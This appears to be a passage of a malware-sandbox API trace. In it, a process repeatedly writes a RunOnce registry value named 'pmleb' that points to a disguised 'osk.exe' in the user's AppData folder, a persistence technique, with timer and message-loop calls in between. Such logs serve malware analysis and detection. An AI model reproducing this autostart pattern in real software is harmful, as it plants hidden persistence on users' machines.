hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.489] RegCloseKey (hKey=0x280) returned 0x0 [0099.489] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.490] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.490] SetTimer (hWnd=0x20280, nIDEvent=0x2323, uElapse=0xa, lpTimerFunc=0x0) returned 0x2323 [0099.490] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.502] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.502] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.502] KillTimer (hWnd=0x20280, uIDEvent=0x2323) returned 1 [0099.503] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.503] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.503] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.503] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.504] RegCloseKey (hKey=0x280) returned 0x0 [0099.504] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.504] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.504] SetTimer (hWnd=0x20280, nIDEvent=0x2324, uElapse=0xa, lpTimerFunc=0x0) returned 0x2324 [0099.504] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.518] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.518] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.518] KillTimer (hWnd=0x20280, uIDEvent=0x2324) returned 1 [0099.519] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.519] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.519] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.519] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.520] RegCloseKey (hKey=0x280) returned 0x0 [0099.520] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.520] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.520] SetTimer (hWnd=0x20280, nIDEvent=0x2325, uElapse=0xa, lpTimerFunc=0x0) returned 0x2325 [0099.520] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.534] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.534] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.534] KillTimer (hWnd=0x20280, uIDEvent=0x2325) returned 1 [0099.534] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.535] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.535] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.535] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.535] RegCloseKey (hKey=0x280) returned 0x0 [0099.535] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.536] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.536] SetTimer (hWnd=0x20280, nIDEvent=0x2326, uElapse=0xa, lpTimerFunc=0x0) returned 0x2326 [0099.536] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.549] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.549] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.549] KillTimer (hWnd=0x20280, uIDEvent=0x2326) returned 1 [0099.549] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.550] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.550] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.550] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.550] RegCloseKey (hKey=0x280) returned 0x0 [0099.550] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.550] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.551] SetTimer (hWnd=0x20280, nIDEvent=0x2327, uElapse=0xa, lpTimerFunc=0x0) returned 0x2327 [0099.551] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.565] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.565] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.565] KillTimer (hWnd=0x20280, 
uIDEvent=0x2327) returned 1 [0099.566] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.566] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.566] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.566] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.567] RegCloseKey (hKey=0x280) returned 0x0 [0099.567] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.567] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.567] SetTimer (hWnd=0x20280, nIDEvent=0x2328, uElapse=0xa, lpTimerFunc=0x0) returned 0x2328 [0099.567] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.580] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.580] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.581] KillTimer (hWnd=0x20280, uIDEvent=0x2328) returned 1 [0099.581] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.581] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.581] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.582] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.582] RegCloseKey (hKey=0x280) returned 0x0 [0099.582] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.582] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.582] SetTimer (hWnd=0x20280, nIDEvent=0x2329, uElapse=0xa, lpTimerFunc=0x0) returned 0x2329 [0099.582] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.612] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.612] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.612] KillTimer (hWnd=0x20280, uIDEvent=0x2329) returned 1 [0099.612] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.613] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.613] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.613] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.613] RegCloseKey (hKey=0x280) returned 0x0 [0099.613] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.614] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.614] SetTimer (hWnd=0x20280, nIDEvent=0x232a, uElapse=0xa, lpTimerFunc=0x0) returned 0x232a [0099.614] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.627] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.627] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.627] KillTimer (hWnd=0x20280, uIDEvent=0x232a) returned 1 [0099.628] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0099.628] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.628] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.628] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.628] RegCloseKey (hKey=0x280) returned 0x0 [0099.628] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.629] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.629] SetTimer (hWnd=0x20280, nIDEvent=0x232b, uElapse=0xa, lpTimerFunc=0x0) returned 0x232b [0099.629] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.644] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.644] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.645] KillTimer (hWnd=0x20280, uIDEvent=0x232b) returned 1 [0099.645] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.645] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.645] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.646] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.646] RegCloseKey (hKey=0x280) returned 0x0 
[0099.646] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.646] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.646] SetTimer (hWnd=0x20280, nIDEvent=0x232c, uElapse=0xa, lpTimerFunc=0x0) returned 0x232c [0099.646] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.658] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.658] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.659] KillTimer (hWnd=0x20280, uIDEvent=0x232c) returned 1 [0099.659] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.659] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.659] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.659] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.660] RegCloseKey (hKey=0x280) returned 0x0 [0099.660] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.660] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.660] SetTimer (hWnd=0x20280, nIDEvent=0x232d, uElapse=0xa, lpTimerFunc=0x0) returned 0x232d [0099.660] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.674] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.674] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.674] KillTimer (hWnd=0x20280, uIDEvent=0x232d) returned 1 [0099.674] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.675] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.675] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.675] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.675] RegCloseKey (hKey=0x280) returned 0x0 [0099.675] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.675] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.676] SetTimer (hWnd=0x20280, nIDEvent=0x232e, uElapse=0xa, lpTimerFunc=0x0) returned 0x232e [0099.676] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.689] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.689] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.690] KillTimer (hWnd=0x20280, uIDEvent=0x232e) returned 1 [0099.690] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.690] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.690] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.691] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.691] RegCloseKey (hKey=0x280) returned 0x0 [0099.691] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.691] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.691] SetTimer (hWnd=0x20280, nIDEvent=0x232f, uElapse=0xa, lpTimerFunc=0x0) returned 0x232f [0099.691] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.706] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.706] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.706] KillTimer (hWnd=0x20280, uIDEvent=0x232f) returned 1 [0099.707] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.707] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.707] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.707] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.708] RegCloseKey (hKey=0x280) returned 0x0 [0099.708] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.708] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.708] SetTimer (hWnd=0x20280, nIDEvent=0x2330, uElapse=0xa, lpTimerFunc=0x0) returned 0x2330 [0099.708] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.721] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.721] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.721] KillTimer (hWnd=0x20280, uIDEvent=0x2330) returned 1 [0099.721] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.722] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.722] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.722] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.722] RegCloseKey (hKey=0x280) returned 0x0 [0099.722] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.723] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.723] SetTimer (hWnd=0x20280, nIDEvent=0x2331, uElapse=0xa, lpTimerFunc=0x0) returned 0x2331 [0099.723] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.736] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.736] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.736] KillTimer (hWnd=0x20280, uIDEvent=0x2331) returned 1 [0099.737] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.737] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.737] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.738] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.738] RegCloseKey (hKey=0x280) returned 0x0 [0099.738] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.738] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0099.738] SetTimer (hWnd=0x20280, nIDEvent=0x2332, uElapse=0xa, lpTimerFunc=0x0) returned 0x2332 [0099.738] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.752] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.752] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.752] KillTimer (hWnd=0x20280, uIDEvent=0x2332) returned 1 [0099.753] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.753] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.753] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.753] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.754] RegCloseKey (hKey=0x280) returned 0x0 [0099.754] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.754] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.754] SetTimer (hWnd=0x20280, nIDEvent=0x2333, uElapse=0xa, lpTimerFunc=0x0) returned 0x2333 [0099.754] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.768] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.768] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.770] KillTimer (hWnd=0x20280, uIDEvent=0x2333) returned 1 [0099.771] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.772] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.772] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.772] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.772] RegCloseKey (hKey=0x280) returned 0x0 [0099.772] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.773] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.773] SetTimer (hWnd=0x20280, nIDEvent=0x2334, uElapse=0xa, lpTimerFunc=0x0) returned 0x2334 [0099.773] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.783] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.783] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.783] KillTimer (hWnd=0x20280, uIDEvent=0x2334) returned 1 [0099.784] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.784] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.784] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.784] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.785] RegCloseKey (hKey=0x280) returned 0x0 [0099.785] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.785] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.785] SetTimer (hWnd=0x20280, nIDEvent=0x2335, uElapse=0xa, lpTimerFunc=0x0) returned 0x2335 
